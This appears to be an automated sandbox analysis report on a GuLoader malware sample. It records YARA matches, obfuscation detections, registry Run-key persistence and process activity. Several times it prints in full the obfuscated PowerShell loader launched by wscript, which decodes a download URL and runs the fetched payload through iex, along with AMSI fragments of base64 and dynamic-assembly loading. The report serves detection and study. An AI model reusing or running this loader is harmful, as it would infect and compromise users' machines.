Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ore.pdb0 source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000B.00000003.2681714587.000000001FF3E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.2786126386.00000000200F0000.00000040.00001000.00020000.00000000.sdmp, icacls.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.2595475474.000000000714B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb/y source: powershell.exe, 00000005.00000002.2599815914.0000000007F00000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2584189007.0000000002BC7000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Con", "0")
Yara detected GuLoader
Source: Yara match File source: 0000000B.00000002.2770622512.0000000002F30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2600779030.0000000008E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2600596089.0000000008400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2590325281.000000000577D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2709902493.000001569006C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Depolarising33)$global:Tjurhanen = [System.Text.Encoding]::ASCII.GetString($Gennemtrnger)$global:Whitlock=$Tjurhanen.substring(314661,28592)<#Mineres Ggepulvere Orthographising Bulde
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Salpeterets $Daddle $Throaty), (Incorrectly @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ngsteligheds = [AppDomain]::CurrentDomain.GetAssemblies()$globa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Handicappers)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Djaevlekulterne, $false).DefineType($Europew
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Depolarising33)$global:Tjurhanen = [System.Text.Encoding]::ASCII.GetString($Gennemtrnger)$global:Whitlock=$Tjurhanen.substring(314661,28592)<#Mineres Ggepulvere Orthographising Bulde
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Spleniform225 = 1;$Figurskaaret='Substrin';$Figurskaaret+='g';Function Nepotistic($Mistnkeligt){$Conchuela=$Mistnkeligt.Length-$Spleniform225;For($Autometamorphosis=5; $Autometamorphosis -lt $Conchuela; $Autometamorphosis+=(6)){$Aversioners+=$Mistnkeligt.$Figurskaaret.Invoke($Autometamorphosis, $Spleniform225);}$Aversioners;}function Enrens($Klippehules135){&($grazable) ($Klippehules135);}$Wedelns=Nepotistic 'JuleeM Spiro NnnezLuthei In elDecenlTjuruakiloj/,itri5Euc l. Tuff0Chemi ,rond(PreciWTri,hiRoscon TreedAggraoElectwHabudsViv,e AboriNAartuTChae. Bekos1Babit0Kmpen.Inarm0 Mono;Dokum InnhoWbegrdiSkrydn,riva6 Bege4Sundh; Diag BenegxOvers6.umss4Sedim;Al id umbrOmforvOutwe:Stunt1Towns2Riddi1 ,osi.Spise0Dalc ) I,du UnintGE.itueDaakac Koffk KnigoCircu/,lnsn2.ount0Paahi1infur0 Effe0catal1udmat0D,wry1For o TeleFB,udbiUdst,r FormePart fKuponoduplixRedni/Part.1P.stn2 Slau1 Lase.Nonec0Milie ';$Bombiccite240=Nepotistic ' PdatURekursVarieeTriumrSmitt- FinfALog.egMisape P,ctnDomest Stor ';$Charger=Nepotistic ' uffohTest t Stent GranpLnmodsKa.to:rekto/Marli/Omnitd Uvilr Depridelsivanhugeves,i.BeirugColl o madro KlokgBeriglTeleuePun.i. Brysc H.tpo lempmSkeed/ Famiu,alsscSh pp?TungteMbelpxNicetptufteoPerivr E entCleme=Ana.sdTr,ldo Snknw Drean NonclD stooproviaLucradGo,sf&U.wraiDistodHindu=verse1Lakmuy Ber,sEmilsXM.rioS .nylWProgrc UgelkSi.de_ Bares p tihGobblf Jac,s V,riiDi stVBagerSI.nijvDuffbxVelv.1SlageUSit,sk UrolpPrintRTetraU Tyfu2VideoRSc,ot4VelarF Sa,kJTvrsk7 AfnakInscr8DemonZBenin ';$Indtgters=Nepotistic 'Aummb>Overe ';$grazable=Nepotistic 'NematiRe ule Yv rxHas.e ';$Skatteprocenters = Nepotistic 'SynsfeSmertcMytolh ManioPostb syste% Undea Skr pRlighpProcedG.umpa KbentSim laBioni%Socia\MenueU R tmd NorijWheezvOkto,nTurbueMonot. BahrMSubstaSymboi Fo k .ill&Pl,dg&Basar ObdureKur,ucTailbhHymenoCzari Ansig$Stil, ';Enrens (Nepotistic 'Josua$Um,akgGenialprevooCent.bDir.saTrdokl Gang: imalUalternKaithcdalevaWaltzvAa ele,gterranklanReheaoDispeuMontas Y arlBuffeyGlot.=Aften( Outgc IndemDagpld Co.p ,isav/EoniacPlagi .rek$StemmSBeredkLjendaSkrmmt.ormitVapo.eCentipOpsmnr eninoSubmicUnsules aglnSchultDesceeNedblrAnthrsF,uep) Lept ');Enrens (Nepotistic 'Selvs$TaarngPrerelUn.wioTeatebGall,aS atkl,dslu:ForbeS M notD stauFor efstinkf intriTentlnunseneFaglrsFikses Grim=Zaddi$ TempC B,reh BalaaThimbrLednig PerqeAcridr nexp.Serassfi.kapInvarlProbliBe,ent,aris(Venog$BacteI tligngabardAbandtJa,nig Horot.ndele CharrDi.gnsMydri)P.dic ');$Charger=$Stuffiness[0];Enrens (Nepotistic 'Tornf$ Palpg,paltlPreatoSp.llbcarp.a ,rtllSamvi:F,rvaFThundrKap taCemetndi,dlkStokklVarebiIntran Int,=RedseN ViceeBoligwDiarb-,latwOBamsebOmbytjNonsyeForlncVal.otStrea OverrSArnauy KulksImmuttJordreFr nkmBeren.UninwNStoreeKa ketTnger.Ep,grWOver,eOplgnbregenC Lr,ilNu,rei TroseTrompnBargetToles ');Enrens (Nepotistic ' Ovip$F.rmaFTrekorPett aKor enUnstokEndo,lAndefi ,aranStren.sta Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B00BD pushad ; iretd 2_2_00007FFD348B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B7967 push ebx; retf 2_2_00007FFD348B796A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BB750 pushad ; ret 5_2_043BB75D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_073608C2 push eax; mov dword ptr [esp], ecx 5_2_07360AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07360AB8 push eax; mov dword ptr [esp], ecx 5_2_07360AC4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201209AD push ecx; mov dword ptr [esp], ecx 11_2_201209B6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F309AD push ecx; mov dword ptr [esp], ecx 13_2_02F309B6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A41D1 push edi; retf 13_2_003A4223
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A4215 push edi; retf 13_2_003A4223
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A266E push eax; iretd 13_2_003A2670
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A8A22 push edx; iretd 13_2_003A8A23
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AABC8 push B2CD0983h; ret 13_2_003AABCE
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003AEE37 push FFFFFFE1h; iretd 13_2_003AEE3D
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_00394E47 push eax; ret 13_2_00394E52
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_00390FFA push edi; ret 13_2_00390FFC
Source: C:\Windows\SysWOW64\icacls.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ML8XFNQ Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ML8XFNQ Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Uses cacls to modify the permissions of files
Source: C:\Program Files (x86)\IkhhjpqkuSBzOMxFOUjnLtXVXvlcwbxQtzqFeoWyOeZdOsgWYMvzhFIgRSISNBlgioszqXJbklLnku\sLGpONHtWjN.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
